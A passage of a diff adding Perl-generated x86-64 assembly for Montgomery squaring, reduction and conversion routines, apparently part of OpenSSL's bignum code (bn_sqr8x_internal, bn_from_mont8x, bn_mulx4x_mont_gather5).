+	adc	\$0,$A1[1]
+
+	mul	$a0			# a[5]*a[2]
+	add	%rax,$A0[0]		# a[5]*a[2]+a[4]*a[3]+t[5]
+	 mov	$ai,%rax
+	 mov	16($aptr,$j),$ai	# a[6]
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	add	$A1[0],$A0[0]
+	adc	\$0,$A0[1]
+
+	mul	$a1			# a[5]*a[3]
+	add	%rax,$A1[1]		# a[5]*a[3]+t[6]
+	 mov	$ai,%rax
+	 mov	$A0[0],8($tptr,$j)	# t[5]
+	mov	%rdx,$A1[0]
+	adc	\$0,$A1[0]
+
+	mul	$a0			# a[6]*a[2]
+	add	%rax,$A0[1]		# a[6]*a[2]+a[5]*a[3]+t[6]
+	 mov	$ai,%rax		# a[3]
+	 mov	24($aptr,$j),$ai	# a[7]
+	mov	%rdx,$A0[0]
+	adc	\$0,$A0[0]
+	add	$A1[1],$A0[1]
+	adc	\$0,$A0[0]
+
+
+	mul	$a1			# a[6]*a[5]
+	add	%rax,$A1[0]		# a[6]*a[5]+t[7]
+	 mov	$ai,%rax
+	 mov	$A0[1],16($tptr,$j)	# t[6]
+	mov	%rdx,$A1[1]
+	adc	\$0,$A1[1]
+	 lea	32($j),$j
+
+	mul	$a0			# a[7]*a[4]
+	add	%rax,$A0[0]		# a[7]*a[4]+a[6]*a[5]+t[6]
+	 mov	$ai,%rax
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	add	$A1[0],$A0[0]
+	adc	\$0,$A0[1]
+	mov	$A0[0],-8($tptr,$j)	# t[7]
+
+	cmp	\$0,$j
+	jne	.Lsqr4x_1st
+
+	mul	$a1			# a[7]*a[5]
+	add	%rax,$A1[1]
+	lea	16($i),$i
+	adc	\$0,%rdx
+	add	$A0[1],$A1[1]
+	adc	\$0,%rdx
+
+	mov	$A1[1],($tptr)		# t[8]
+	mov	%rdx,$A1[0]
+	mov	%rdx,8($tptr)		# t[9]
+	jmp	.Lsqr4x_outer
+
+.align	32
+.Lsqr4x_outer:				# comments apply to $num==6 case
+	mov	-32($aptr,$i),$a0	# a[0]
+	lea	48+8(%rsp,$num,2),$tptr	# end of tp[] buffer, &tp[2*$num]
+	mov	-24($aptr,$i),%rax	# a[1]
+	lea	-32($tptr,$i),$tptr	# end of tp[] window, &tp[2*$num-"$i"]
+	mov	-16($aptr,$i),$ai	# a[2]
+	mov	%rax,$a1
+
+	mul	$a0			# a[1]*a[0]
+	mov	-24($tptr,$i),$A0[0]	# t[1]
+	add	%rax,$A0[0]		# a[1]*a[0]+t[1]
+	 mov	$ai,%rax		# a[2]
+	adc	\$0,%rdx
+	mov	$A0[0],-24($tptr,$i)	# t[1]
+	mov	%rdx,$A0[1]
+
+	mul	$a0			# a[2]*a[0]
+	add	%rax,$A0[1]
+	 mov	$ai,%rax
+	adc	\$0,%rdx
+	add	-16($tptr,$i),$A0[1]	# a[2]*a[0]+t[2]
+	mov	%rdx,$A0[0]
+	adc	\$0,$A0[0]
+	mov	$A0[1],-16($tptr,$i)	# t[2]
+
+	xor	$A1[0],$A1[0]
+
+	 mov	-8($aptr,$i),$ai	# a[3]
+	mul	$a1			# a[2]*a[1]
+	add	%rax,$A1[0]		# a[2]*a[1]+t[3]
+	 mov	$ai,%rax
+	adc	\$0,%rdx
+	add	-8($tptr,$i),$A1[0]
+	mov	%rdx,$A1[1]
+	adc	\$0,$A1[1]
+
+	mul	$a0			# a[3]*a[0]
+	add	%rax,$A0[0]		# a[3]*a[0]+a[2]*a[1]+t[3]
+	 mov	$ai,%rax
+	adc	\$0,%rdx
+	add	$A1[0],$A0[0]
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	mov	$A0[0],-8($tptr,$i)	# t[3]
+
+	lea	($i),$j
+	jmp	.Lsqr4x_inner
+
+.align	32
+.Lsqr4x_inner:
+	 mov	($aptr,$j),$ai		# a[4]
+	mul	$a1			# a[3]*a[1]
+	add	%rax,$A1[1]		# a[3]*a[1]+t[4]
+	 mov	$ai,%rax
+	mov	%rdx,$A1[0]
+	adc	\$0,$A1[0]
+	add	($tptr,$j),$A1[1]
+	adc	\$0,$A1[0]
+
+	.byte	0x67
+	mul	$a0			# a[4]*a[0]
+	add	%rax,$A0[1]		# a[4]*a[0]+a[3]*a[1]+t[4]
+	 mov	$ai,%rax		# a[3]
+	 mov	8($aptr,$j),$ai		# a[5]
+	mov	%rdx,$A0[0]
+	adc	\$0,$A0[0]
+	add	$A1[1],$A0[1]
+	adc	\$0,$A0[0]
+
+	mul	$a1			# a[4]*a[3]
+	add	%rax,$A1[0]		# a[4]*a[3]+t[5]
+	mov	$A0[1],($tptr,$j)	# t[4]
+	 mov	$ai,%rax
+	mov	%rdx,$A1[1]
+	adc	\$0,$A1[1]
+	add	8($tptr,$j),$A1[0]
+	lea	16($j),$j		# j++
+	adc	\$0,$A1[1]
+
+	mul	$a0			# a[5]*a[2]
+	add	%rax,$A0[0]		# a[5]*a[2]+a[4]*a[3]+t[5]
+	 mov	$ai,%rax
+	adc	\$0,%rdx
+	add	$A1[0],$A0[0]
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	mov	$A0[0],-8($tptr,$j)	# t[5], "preloaded t[1]" below
+
+	cmp	\$0,$j
+	jne	.Lsqr4x_inner
+
+	.byte	0x67
+	mul	$a1			# a[5]*a[3]
+	add	%rax,$A1[1]
+	adc	\$0,%rdx
+	add	$A0[1],$A1[1]
+	adc	\$0,%rdx
+
+	mov	$A1[1],($tptr)		# t[6], "preloaded t[2]" below
+	mov	%rdx,$A1[0]
+	mov	%rdx,8($tptr)		# t[7], "preloaded t[3]" below
+
+	add	\$16,$i
+	jnz	.Lsqr4x_outer
+
+					# comments apply to $num==4 case
+	mov	-32($aptr),$a0		# a[0]
+	lea	48+8(%rsp,$num,2),$tptr	# end of tp[] buffer, &tp[2*$num]
+	mov	-24($aptr),%rax		# a[1]
+	lea	-32($tptr,$i),$tptr	# end of tp[] window, &tp[2*$num-"$i"]
+	mov	-16($aptr),$ai		# a[2]
+	mov	%rax,$a1
+
+	mul	$a0			# a[1]*a[0]
+	add	%rax,$A0[0]		# a[1]*a[0]+t[1], preloaded t[1]
+	 mov	$ai,%rax		# a[2]
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+
+	mul	$a0			# a[2]*a[0]
+	add	%rax,$A0[1]
+	 mov	$ai,%rax
+	 mov	$A0[0],-24($tptr)	# t[1]
+	mov	%rdx,$A0[0]
+	adc	\$0,$A0[0]
+	add	$A1[1],$A0[1]		# a[2]*a[0]+t[2], preloaded t[2]
+	 mov	-8($aptr),$ai		# a[3]
+	adc	\$0,$A0[0]
+
+	mul	$a1			# a[2]*a[1]
+	add	%rax,$A1[0]		# a[2]*a[1]+t[3], preloaded t[3]
+	 mov	$ai,%rax
+	 mov	$A0[1],-16($tptr)	# t[2]
+	mov	%rdx,$A1[1]
+	adc	\$0,$A1[1]
+
+	mul	$a0			# a[3]*a[0]
+	add	%rax,$A0[0]		# a[3]*a[0]+a[2]*a[1]+t[3]
+	 mov	$ai,%rax
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	add	$A1[0],$A0[0]
+	adc	\$0,$A0[1]
+	mov	$A0[0],-8($tptr)	# t[3]
+
+	mul	$a1			# a[3]*a[1]
+	add	%rax,$A1[1]
+	 mov	-16($aptr),%rax		# a[2]
+	adc	\$0,%rdx
+	add	$A0[1],$A1[1]
+	adc	\$0,%rdx
+
+	mov	$A1[1],($tptr)		# t[4]
+	mov	%rdx,$A1[0]
+	mov	%rdx,8($tptr)		# t[5]
+
+	mul	$ai			# a[2]*a[3]
+___
+{
+my ($shift,$carry)=($a0,$a1);
+my @S=(@A1,$ai,$n0);
+$code.=<<___;
+	 add	\$16,$i
+	 xor	$shift,$shift
+	 sub	$num,$i			# $i=16-$num
+	 xor	$carry,$carry
+
+	add	$A1[0],%rax		# t[5]
+	adc	\$0,%rdx
+	mov	%rax,8($tptr)		# t[5]
+	mov	%rdx,16($tptr)		# t[6]
+	mov	$carry,24($tptr)	# t[7]
+
+	 mov	-16($aptr,$i),%rax	# a[0]
+	lea	48+8(%rsp),$tptr
+	 xor	$A0[0],$A0[0]		# t[0]
+	 mov	8($tptr),$A0[1]		# t[1]
+
+	lea	($shift,$A0[0],2),$S[0]	# t[2*i]<<1 | shift
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[1]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[1]		# | t[2*i]>>63
+	 mov	16($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	24($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[0]
+	 mov	-8($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[0],($tptr)
+	adc	%rdx,$S[1]
+
+	lea	($shift,$A0[0],2),$S[2]	# t[2*i]<<1 | shift
+	 mov	$S[1],8($tptr)
+	 sbb	$carry,$carry		# mov cf,$carry
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[3]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[3]		# | t[2*i]>>63
+	 mov	32($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	40($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[2]
+	 mov	0($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[2],16($tptr)
+	adc	%rdx,$S[3]
+	lea	16($i),$i
+	mov	$S[3],24($tptr)
+	sbb	$carry,$carry		# mov cf,$carry
+	lea	64($tptr),$tptr
+	jmp	.Lsqr4x_shift_n_add
+
+.align	32
+.Lsqr4x_shift_n_add:
+	lea	($shift,$A0[0],2),$S[0]	# t[2*i]<<1 | shift
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[1]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[1]		# | t[2*i]>>63
+	 mov	-16($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	-8($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[0]
+	 mov	-8($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[0],-32($tptr)
+	adc	%rdx,$S[1]
+
+	lea	($shift,$A0[0],2),$S[2]	# t[2*i]<<1 | shift
+	 mov	$S[1],-24($tptr)
+	 sbb	$carry,$carry		# mov cf,$carry
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[3]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[3]		# | t[2*i]>>63
+	 mov	0($tptr),$A0[0]		# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	8($tptr),$A0[1]		# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[2]
+	 mov	0($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[2],-16($tptr)
+	adc	%rdx,$S[3]
+
+	lea	($shift,$A0[0],2),$S[0]	# t[2*i]<<1 | shift
+	 mov	$S[3],-8($tptr)
+	 sbb	$carry,$carry		# mov cf,$carry
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[1]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[1]		# | t[2*i]>>63
+	 mov	16($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	24($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[0]
+	 mov	8($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[0],0($tptr)
+	adc	%rdx,$S[1]
+
+	lea	($shift,$A0[0],2),$S[2]	# t[2*i]<<1 | shift
+	 mov	$S[1],8($tptr)
+	 sbb	$carry,$carry		# mov cf,$carry
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[3]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[3]		# | t[2*i]>>63
+	 mov	32($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	40($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[2]
+	 mov	16($aptr,$i),%rax	# a[i+1]	# prefetch
+	mov	$S[2],16($tptr)
+	adc	%rdx,$S[3]
+	mov	$S[3],24($tptr)
+	sbb	$carry,$carry		# mov cf,$carry
+	lea	64($tptr),$tptr
+	add	\$32,$i
+	jnz	.Lsqr4x_shift_n_add
+
+	lea	($shift,$A0[0],2),$S[0]	# t[2*i]<<1 | shift
+	.byte	0x67
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[1]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[1]		# | t[2*i]>>63
+	 mov	-16($tptr),$A0[0]	# t[2*i+2]	# prefetch
+	mov	$A0[1],$shift		# shift=t[2*i+1]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	 mov	-8($tptr),$A0[1]	# t[2*i+2+1]	# prefetch
+	adc	%rax,$S[0]
+	 mov	-8($aptr),%rax		# a[i+1]	# prefetch
+	mov	$S[0],-32($tptr)
+	adc	%rdx,$S[1]
+
+	lea	($shift,$A0[0],2),$S[2]	# t[2*i]<<1|shift
+	 mov	$S[1],-24($tptr)
+	 sbb	$carry,$carry		# mov cf,$carry
+	shr	\$63,$A0[0]
+	lea	($j,$A0[1],2),$S[3]	# t[2*i+1]<<1 |
+	shr	\$63,$A0[1]
+	or	$A0[0],$S[3]		# | t[2*i]>>63
+	mul	%rax			# a[i]*a[i]
+	neg	$carry			# mov $carry,cf
+	adc	%rax,$S[2]
+	adc	%rdx,$S[3]
+	mov	$S[2],-16($tptr)
+	mov	$S[3],-8($tptr)
+___
+}
+######################################################################
+# Montgomery reduction part, "word-by-word" algorithm.
+#
+# This new path is inspired by multiple submissions from Intel, by
+# Shay Gueron, Vlad Krasnov, Erdinc Ozturk, James Guilford,
+# Vinodh Gopal...
+{
+my ($nptr,$tptr,$carry,$m0)=("%rbp","%rdi","%rsi","%rbx");
+
+$code.=<<___;
+	movq	%xmm2,$nptr
+sqr8x_reduction:
+	xor	%rax,%rax
+	lea	($nptr,$num,2),%rcx	# end of n[]
+	lea	48+8(%rsp,$num,2),%rdx	# end of t[] buffer
+	mov	%rcx,0+8(%rsp)
+	lea	48+8(%rsp,$num),$tptr	# end of initial t[] window
+	mov	%rdx,8+8(%rsp)
+	neg	$num
+	jmp	.L8x_reduction_loop
+
+.align	32
+.L8x_reduction_loop:
+	lea	($tptr,$num),$tptr	# start of current t[] window
+	.byte	0x66
+	mov	8*0($tptr),$m0
+	mov	8*1($tptr),%r9
+	mov	8*2($tptr),%r10
+	mov	8*3($tptr),%r11
+	mov	8*4($tptr),%r12
+	mov	8*5($tptr),%r13
+	mov	8*6($tptr),%r14
+	mov	8*7($tptr),%r15
+	mov	%rax,(%rdx)		# store top-most carry bit
+	lea	8*8($tptr),$tptr
+
+	.byte	0x67
+	mov	$m0,%r8
+	imulq	32+8(%rsp),$m0		# n0*a[0]
+	mov	16*0($nptr),%rax	# n[0]
+	mov	\$8,%ecx
+	jmp	.L8x_reduce
+
+.align	32
+.L8x_reduce:
+	mulq	$m0
+	 mov	16*1($nptr),%rax	# n[1]
+	neg	%r8
+	mov	%rdx,%r8
+	adc	\$0,%r8
+
+	mulq	$m0
+	add	%rax,%r9
+	 mov	16*2($nptr),%rax
+	adc	\$0,%rdx
+	add	%r9,%r8
+	 mov	$m0,48-8+8(%rsp,%rcx,8)	# put aside n0*a[i]
+	mov	%rdx,%r9
+	adc	\$0,%r9
+
+	mulq	$m0
+	add	%rax,%r10
+	 mov	16*3($nptr),%rax
+	adc	\$0,%rdx
+	add	%r10,%r9
+	 mov	32+8(%rsp),$carry	# pull n0, borrow $carry
+	mov	%rdx,%r10
+	adc	\$0,%r10
+
+	mulq	$m0
+	add	%rax,%r11
+	 mov	16*4($nptr),%rax
+	adc	\$0,%rdx
+	 imulq	%r8,$carry		# modulo-scheduled
+	add	%r11,%r10
+	mov	%rdx,%r11
+	adc	\$0,%r11
+
+	mulq	$m0
+	add	%rax,%r12
+	 mov	16*5($nptr),%rax
+	adc	\$0,%rdx
+	add	%r12,%r11
+	mov	%rdx,%r12
+	adc	\$0,%r12
+
+	mulq	$m0
+	add	%rax,%r13
+	 mov	16*6($nptr),%rax
+	adc	\$0,%rdx
+	add	%r13,%r12
+	mov	%rdx,%r13
+	adc	\$0,%r13
+
+	mulq	$m0
+	add	%rax,%r14
+	 mov	16*7($nptr),%rax
+	adc	\$0,%rdx
+	add	%r14,%r13
+	mov	%rdx,%r14
+	adc	\$0,%r14
+
+	mulq	$m0
+	 mov	$carry,$m0		# n0*a[i]
+	add	%rax,%r15
+	 mov	16*0($nptr),%rax	# n[0]
+	adc	\$0,%rdx
+	add	%r15,%r14
+	mov	%rdx,%r15
+	adc	\$0,%r15
+
+	dec	%ecx
+	jnz	.L8x_reduce
+
+	lea	16*8($nptr),$nptr
+	xor	%rax,%rax
+	mov	8+8(%rsp),%rdx		# pull end of t[]
+	cmp	0+8(%rsp),$nptr		# end of n[]?
+	jae	.L8x_no_tail
+
+	.byte	0x66
+	add	8*0($tptr),%r8
+	adc	8*1($tptr),%r9
+	adc	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	sbb	$carry,$carry		# top carry
+
+	mov	48+56+8(%rsp),$m0	# pull n0*a[0]
+	mov	\$8,%ecx
+	mov	16*0($nptr),%rax
+	jmp	.L8x_tail
+
+.align	32
+.L8x_tail:
+	mulq	$m0
+	add	%rax,%r8
+	 mov	16*1($nptr),%rax
+	 mov	%r8,($tptr)		# save result
+	mov	%rdx,%r8
+	adc	\$0,%r8
+
+	mulq	$m0
+	add	%rax,%r9
+	 mov	16*2($nptr),%rax
+	adc	\$0,%rdx
+	add	%r9,%r8
+	 lea	8($tptr),$tptr		# $tptr++
+	mov	%rdx,%r9
+	adc	\$0,%r9
+
+	mulq	$m0
+	add	%rax,%r10
+	 mov	16*3($nptr),%rax
+	adc	\$0,%rdx
+	add	%r10,%r9
+	mov	%rdx,%r10
+	adc	\$0,%r10
+
+	mulq	$m0
+	add	%rax,%r11
+	 mov	16*4($nptr),%rax
+	adc	\$0,%rdx
+	add	%r11,%r10
+	mov	%rdx,%r11
+	adc	\$0,%r11
+
+	mulq	$m0
+	add	%rax,%r12
+	 mov	16*5($nptr),%rax
+	adc	\$0,%rdx
+	add	%r12,%r11
+	mov	%rdx,%r12
+	adc	\$0,%r12
+
+	mulq	$m0
+	add	%rax,%r13
+	 mov	16*6($nptr),%rax
+	adc	\$0,%rdx
+	add	%r13,%r12
+	mov	%rdx,%r13
+	adc	\$0,%r13
+
+	mulq	$m0
+	add	%rax,%r14
+	 mov	16*7($nptr),%rax
+	adc	\$0,%rdx
+	add	%r14,%r13
+	mov	%rdx,%r14
+	adc	\$0,%r14
+
+	mulq	$m0
+	 mov	48-16+8(%rsp,%rcx,8),$m0# pull n0*a[i]
+	add	%rax,%r15
+	adc	\$0,%rdx
+	add	%r15,%r14
+	 mov	16*0($nptr),%rax	# pull n[0]
+	mov	%rdx,%r15
+	adc	\$0,%r15
+
+	dec	%ecx
+	jnz	.L8x_tail
+
+	lea	16*8($nptr),$nptr
+	mov	8+8(%rsp),%rdx		# pull end of t[]
+	cmp	0+8(%rsp),$nptr		# end of n[]?
+	jae	.L8x_tail_done		# break out of loop
+
+	 mov	48+56+8(%rsp),$m0	# pull n0*a[0]
+	neg	$carry
+	 mov	8*0($nptr),%rax		# pull n[0]
+	adc	8*0($tptr),%r8
+	adc	8*1($tptr),%r9
+	adc	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	sbb	$carry,$carry		# top carry
+
+	mov	\$8,%ecx
+	jmp	.L8x_tail
+
+.align	32
+.L8x_tail_done:
+	add	(%rdx),%r8		# can this overflow?
+	xor	%rax,%rax
+
+	neg	$carry
+.L8x_no_tail:
+	adc	8*0($tptr),%r8
+	adc	8*1($tptr),%r9
+	adc	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	adc	\$0,%rax		# top-most carry
+	 mov	-16($nptr),%rcx		# np[num-1]
+	 xor	$carry,$carry
+
+	movq	%xmm2,$nptr		# restore $nptr
+
+	mov	%r8,8*0($tptr)		# store top 512 bits
+	mov	%r9,8*1($tptr)
+	 movq	%xmm3,$num		# $num is %r9, can't be moved upwards
+	mov	%r10,8*2($tptr)
+	mov	%r11,8*3($tptr)
+	mov	%r12,8*4($tptr)
+	mov	%r13,8*5($tptr)
+	mov	%r14,8*6($tptr)
+	mov	%r15,8*7($tptr)
+	lea	8*8($tptr),$tptr
+
+	cmp	%rdx,$tptr		# end of t[]?
+	jb	.L8x_reduction_loop
+___
+}
+##############################################################
+# Post-condition, 4x unrolled
+#
+{
+my ($tptr,$nptr)=("%rbx","%rbp");
+$code.=<<___;
+	#xor	%rsi,%rsi		# %rsi was $carry above
+	sub	%r15,%rcx		# compare top-most words
+	lea	(%rdi,$num),$tptr	# %rdi was $tptr above
+	adc	%rsi,%rsi
+	mov	$num,%rcx
+	or	%rsi,%rax
+	movq	%xmm1,$rptr		# restore $rptr
+	xor	\$1,%rax
+	movq	%xmm1,$aptr		# prepare for back-to-back call
+	lea	($nptr,%rax,8),$nptr
+	sar	\$3+2,%rcx		# cf=0
+	jmp	.Lsqr4x_sub
+
+.align	32
+.Lsqr4x_sub:
+	.byte	0x66
+	mov	8*0($tptr),%r12
+	mov	8*1($tptr),%r13
+	sbb	16*0($nptr),%r12
+	mov	8*2($tptr),%r14
+	sbb	16*1($nptr),%r13
+	mov	8*3($tptr),%r15
+	lea	8*4($tptr),$tptr
+	sbb	16*2($nptr),%r14
+	mov	%r12,8*0($rptr)
+	sbb	16*3($nptr),%r15
+	lea	16*4($nptr),$nptr
+	mov	%r13,8*1($rptr)
+	mov	%r14,8*2($rptr)
+	mov	%r15,8*3($rptr)
+	lea	8*4($rptr),$rptr
+
+	inc	%rcx			# pass %cf
+	jnz	.Lsqr4x_sub
+___
+}
+$code.=<<___;
+	mov	$num,%r10		# prepare for back-to-back call
+	neg	$num			# restore $num	
+	ret
+.size	bn_sqr8x_internal,.-bn_sqr8x_internal
+___
+{
+$code.=<<___;
+.globl	bn_from_montgomery
+.type	bn_from_montgomery,\@abi-omnipotent
+.align	32
+bn_from_montgomery:
+	testl	\$7,`($win64?"48(%rsp)":"%r9d")`
+	jz	bn_from_mont8x
+	xor	%eax,%eax
+	ret
+.size	bn_from_montgomery,.-bn_from_montgomery
+
+.type	bn_from_mont8x,\@function,6
+.align	32
+bn_from_mont8x:
+	.byte	0x67
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	.byte	0x67
+	mov	${num}d,%r10d
+	shl	\$3,${num}d		# convert $num to bytes
+	shl	\$3+2,%r10d		# 4*$num
+	neg	$num
+	mov	($n0),$n0		# *n0
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr+4*$num
+	# modulo 4096, which covers ret[num], am[num] and n[2*num]
+	# (see bn_exp.c). this is done to allow memory disambiguation
+	# logic do its magic.
+	#
+	lea	-64(%rsp,$num,2),%r11
+	sub	$aptr,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lfrom_sp_alt
+	sub	%r11,%rsp		# align with $aptr
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	jmp	.Lfrom_sp_done
+
+.align	32
+.Lfrom_sp_alt:
+	lea	4096-64(,$num,2),%r10	# 4096-frame-2*$num
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
+.Lfrom_sp_done:
+	and	\$-64,%rsp
+	mov	$num,%r10	
+	neg	$num
+
+	##############################################################
+	# Stack layout
+	#
+	# +0	saved $num, used in reduction section
+	# +8	&t[2*$num], used in reduction section
+	# +32	saved *n0
+	# +40	saved %rsp
+	# +48	t[2*$num]
+	#
+	mov	$n0,  32(%rsp)
+	mov	%rax, 40(%rsp)		# save original %rsp
+.Lfrom_body:
+	mov	$num,%r11
+	lea	48(%rsp),%rax
+	pxor	%xmm0,%xmm0
+	jmp	.Lmul_by_1
+
+.align	32
+.Lmul_by_1:
+	movdqu	($aptr),%xmm1
+	movdqu	16($aptr),%xmm2
+	movdqu	32($aptr),%xmm3
+	movdqa	%xmm0,(%rax,$num)
+	movdqu	48($aptr),%xmm4
+	movdqa	%xmm0,16(%rax,$num)
+	.byte	0x48,0x8d,0xb6,0x40,0x00,0x00,0x00	# lea	64($aptr),$aptr
+	movdqa	%xmm1,(%rax)
+	movdqa	%xmm0,32(%rax,$num)
+	movdqa	%xmm2,16(%rax)
+	movdqa	%xmm0,48(%rax,$num)
+	movdqa	%xmm3,32(%rax)
+	movdqa	%xmm4,48(%rax)
+	lea	64(%rax),%rax
+	sub	\$64,%r11
+	jnz	.Lmul_by_1
+
+	movq	$rptr,%xmm1
+	movq	$nptr,%xmm2
+	.byte	0x67
+	mov	$nptr,%rbp
+	movq	%r10, %xmm3		# -num
+___
+$code.=<<___ if ($addx);
+	mov	OPENSSL_ia32cap_P+8(%rip),%r11d
+	and	\$0x80100,%r11d
+	cmp	\$0x80100,%r11d
+	jne	.Lfrom_mont_nox
+
+	lea	(%rax,$num),$rptr
+	call	sqrx8x_reduction
+
+	pxor	%xmm0,%xmm0
+	lea	48(%rsp),%rax
+	mov	40(%rsp),%rsi		# restore %rsp
+	jmp	.Lfrom_mont_zero
+
+.align	32
+.Lfrom_mont_nox:
+___
+$code.=<<___;
+	call	sqr8x_reduction
+
+	pxor	%xmm0,%xmm0
+	lea	48(%rsp),%rax
+	mov	40(%rsp),%rsi		# restore %rsp
+	jmp	.Lfrom_mont_zero
+
+.align	32
+.Lfrom_mont_zero:
+	movdqa	%xmm0,16*0(%rax)
+	movdqa	%xmm0,16*1(%rax)
+	movdqa	%xmm0,16*2(%rax)
+	movdqa	%xmm0,16*3(%rax)
+	lea	16*4(%rax),%rax
+	sub	\$32,$num
+	jnz	.Lfrom_mont_zero
+
+	mov	\$1,%rax
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lfrom_epilogue:
+	ret
+.size	bn_from_mont8x,.-bn_from_mont8x
+___
+}
+}}}
+
+if ($addx) {{{
+my $bp="%rdx";	# restore original value
+
+$code.=<<___;
+.type	bn_mulx4x_mont_gather5,\@function,6
+.align	32
+bn_mulx4x_mont_gather5:
+.Lmulx4x_enter:
+	.byte	0x67
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	.byte	0x67
+	mov	${num}d,%r10d
+	shl	\$3,${num}d		# convert $num to bytes
+	shl	\$3+2,%r10d		# 4*$num
+	neg	$num			# -$num
+	mov	($n0),$n0		# *n0
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr+4*$num
+	# modulo 4096, which covers a[num], ret[num] and n[2*num]
+	# (see bn_exp.c). this is done to allow memory disambiguation
+	# logic do its magic. [excessive frame is allocated in order
+	# to allow bn_from_mont8x to clear it.]
+	#
+	lea	-64(%rsp,$num,2),%r11
+	sub	$ap,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lmulx4xsp_alt
+	sub	%r11,%rsp		# align with $aptr
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+$num)
+	jmp	.Lmulx4xsp_done
+
+.align	32
+.Lmulx4xsp_alt:
+	lea	4096-64(,$num,2),%r10	# 4096-frame-$num
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+$num)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
